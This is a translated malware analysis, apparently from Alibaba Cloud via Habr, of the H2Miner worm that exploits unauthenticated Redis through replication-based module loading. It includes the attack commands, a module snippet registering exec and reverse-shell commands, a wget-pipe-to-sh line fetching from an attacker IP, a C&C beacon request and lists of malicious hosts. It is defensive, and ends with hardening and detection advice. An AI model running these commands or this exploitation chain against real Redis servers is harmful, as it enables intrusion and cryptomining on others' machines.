主持人 > 博客 > 管理 > 发现新一轮 H2Miner 蠕虫病毒利用 Redis RCE

发现新一轮 H2Miner 蠕虫病毒利用 Redis RCE

一天前,我项目的一台服务器受到了类似蠕虫病毒的攻击。 寻找“那是什么?”这个问题的答案。 我发现阿里云安全团队写的一篇很棒的文章。 由于我没有找到关于 Habré 的这篇文章,所以我决定专门为您翻译一下<3

输入

近日,阿里云安全团队发现H2Miner突然爆发。 此类恶意蠕虫利用Redis缺乏授权或弱口令作为进入您系统的网关,通过主从同步的方式将自身的恶意模块与从机同步,最终将该恶意模块下载到被攻击机器上并执行恶意代码指示。

过去,对您的系统的攻击主要是使用计划任务或攻击者登录 Redis 后写入您的计算机的 SSH 密钥的方法进行的。 幸运的是,由于权限控制问题或者由于系统版本不同,这种方法不能经常使用。 然而,这种加载恶意模块的方法可以直接执行攻击者的命令或获得shell的访问权限,这对您的系统来说是危险的。

由于互联网上托管着大量Redis服务器(近1万台),阿里云安全团队友情提醒,建议用户不要在线共享Redis,并定期检查密码强度以及是否被泄露。快速选择。

H2矿工

H2Miner 是一个针对基于 Linux 的系统的挖矿僵尸网络,它可以通过多种方式入侵您的系统,包括 Hadoop Yarn 缺乏授权、Docker 和 Redis 远程命令执行 (RCE) 漏洞。 僵尸网络的工作原理是下载恶意脚本和恶意软件来挖掘您的数据、水平扩展攻击并维持命令和控制 (C&C) 通信。

Redis 远程代码执行

Pavel Toporkov 在 ZeroNights 2018 上分享了这方面的知识。在 4.0 版本之后,Redis 支持插件加载功能,使用户能够将 C 编译的 so 文件加载到 Redis 中,以执行特定的 Redis 命令。 该功能虽然有用,但包含一个漏洞,在主从模式下,文件可以通过 fullresync 模式与从机同步。 攻击者可以利用它来传输恶意so文件。 传输完成后,攻击者将模块加载到被攻击的Redis实例上并执行任意命令。

恶意软件蠕虫分析

近日,阿里云安全团队发现H2Miner恶意矿工群体规模突然大幅增长。 根据分析,攻击发生的大致流程如下:

发现新一轮 H2Miner 蠕虫病毒利用 Redis RCE

H2Miner 使用 RCE Redis 进行全面攻击。 攻击者首先攻击未受保护的Redis服务器或密码较弱的服务器。

然后他们使用命令 config set dbfilename red2.so 更改文件名。 之后,攻击者执行命令 slaveof 设置主从复制主机地址。

当被攻击的Redis实例与攻击者拥有的恶意Redis建立主从连接时,攻击者使用fullresync命令发送受感染的模块来同步文件。 然后 red2.so 文件将被下载到被攻击的机器上。 然后攻击者使用./red2.so加载模块来加载这个so文件。 该模块可以执行攻击者的命令或发起反向连接(后门)以访问受攻击的机器。

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

执行恶意命令后,例如 / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1之后,攻击者会重置备份文件名并卸载系统模块来清理痕迹。 但是,red2.so 文件仍会保留在受攻击的计算机上。 建议用户注意其 Redis 实例的文件夹中是否存在此类可疑文件。

攻击者除了杀死一些恶意进程来窃取资源外,还通过下载并执行恶意二进制文件来跟踪恶意脚本 142.44.191.122/金辛。 这意味着主机上包含kinsing的进程名或目录名可能表明该机器已被该病毒感染。

根据逆向工程结果,该恶意软件主要执行以下功能:

  • 上传文件并执行它们
  • 矿业
  • 维持C&C通信并执行攻击者命令

发现新一轮 H2Miner 蠕虫病毒利用 Redis RCE

使用masscan进行外部扫描,扩大你的影响力。 另外,程序中硬编码了C&C服务器的IP地址,被攻击主机将通过HTTP请求与C&C通信服务器进行通信,其中僵尸(受感染服务器)信息在HTTP标头中标识。

发现新一轮 H2Miner 蠕虫病毒利用 Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

其他攻击方式

发现新一轮 H2Miner 蠕虫病毒利用 Redis RCE

蠕虫使用的地址和链接

/金辛

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

施恩茨

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

评议会

首先,Redis 不应该从 Internet 访问,并且应该使用强密码进行保护。 同样重要的是,客户端检查 Redis 目录中没有 red2.so 文件,并且主机上的文件/进程名称中没有“kinsing”。

来源: habr.com

添加评论